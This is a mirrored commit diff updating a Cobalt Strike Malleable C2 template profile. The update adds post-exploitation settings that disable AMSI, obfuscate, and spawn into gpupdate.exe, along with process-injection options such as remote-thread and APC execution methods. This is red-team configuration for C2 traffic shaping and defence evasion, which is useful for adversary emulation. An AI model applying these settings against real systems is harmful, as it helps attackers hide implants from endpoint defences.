infosecn1nja
/
Malleable-C2-Profiles
mirror of https://github.com/infosecn1nja/Malleable-C2-Profiles.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update template.profile

master
xx0hcd 2019-05-09 15:12:39 -05:00 committed by GitHub
parent da3885e550
commit f1722d455d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 41 additions and 31 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

72
template.profile
View File

@ -1,5 +1,5 @@
#template profile #template profile - updated with 3.14 options
#options from https://www.cobaltstrike.com/help-malleable-c2 #options from https://www.cobaltstrike.com/help-malleable-c2 and https://www.cobaltstrike.com/help-malleable-postex
#attempt to get everything in one place with examples. #attempt to get everything in one place with examples.
#xx0hcd #xx0hcd
@ -60,6 +60,8 @@ http-config {
header "Connection" "close"; header "Connection" "close";
header "Cache-Control" "max-age=2"; header "Cache-Control" "max-age=2";
header "Server" "nginx"; header "Server" "nginx";
#set "true" if teamserver is behind redirector
set trust_x_forwarded_for "false";
} }
#the client GET function checks if there are tasks queued. #the client GET function checks if there are tasks queued.
@ -230,10 +232,10 @@ http-stager {
set uri_x64 "/console"; set uri_x64 "/console";
client { client {
header "Host" "whatever.com"; header "Host" "whatever.com";
header "Accept" "*/*"; header "Accept" "*/*";
header "Accept-Language" "en-US"; header "Accept-Language" "en-US";
header "Connection" "close"; header "Connection" "close";
} }
server { server {
@ -250,12 +252,18 @@ http-stager {
###Malleable PE Options### ###Malleable PE Options###
#Sets the default program to open and inject shellcode into. post-ex {
set spawnto_x86 "%windir%\\syswow64\\gpupdate.exe";
set spawnto_x64 "%windir%\\sysnative\\gpupdate.exe";
#attempt to disable amsi for execute-assembly, powerpick, and psinject. set spawnto_x86 "%windir%\\syswow64\\gpupdate.exe";
set amsi_disable "true"; set spawnto_x64 "%windir%\\sysnative\\gpupdate.exe";
set obfuscate "true";
set smartinject "true";
set amsi_disable "true";
}
#use peclone on the dll you want to use, this example uses wwanmm.dll. You can also set the values manually. #use peclone on the dll you want to use, this example uses wwanmm.dll. You can also set the values manually.
#don't use 'set image_size_xx' if using 'set module_xx'. During testing it seemed to double the size of my payload causing module stomp to fail, need to test it out more though. #don't use 'set image_size_xx' if using 'set module_xx'. During testing it seemed to double the size of my payload causing module stomp to fail, need to test it out more though.
@ -305,28 +313,30 @@ stage {
stringw "something"; stringw "something";
} }
#controls process injection behavior #controls process injection behavior
process-inject { process-inject {
set min_alloc "16700";
set allocator "NtMapViewOfSection";
set min_alloc "16700";
set userwx "false";
set startrwx "true"; set startrwx "true";
set userwx "false";
transform-x86 {
prepend "\x90\x90\x90";
}
transform-x64 {
prepend "\x90\x90\x90";
}
transform-x86 { execute {
prepend "\x90\x90\x90"; CreateThread "ntdll!RtlUserThreadStart";
} CreateThread;
transform-x64 { NtQueueApcThread;
prepend "\x90\x90\x90"; CreateRemoteThread;
} RtlCreateUserThread;
}
#disable can cause some beacon issues
#no c2lint warning...
disable "SetThreadContext";
#c2lint warning ".process-inject disables several functions. As a result: x86 -> x86 injection will fail."
#disable "CreateRemoteThread";
#c2lint warning ".process-inject disables several functions. As a result: x86 -> x64 injection will fail."
#disable "RtlCreateUserThread";
} }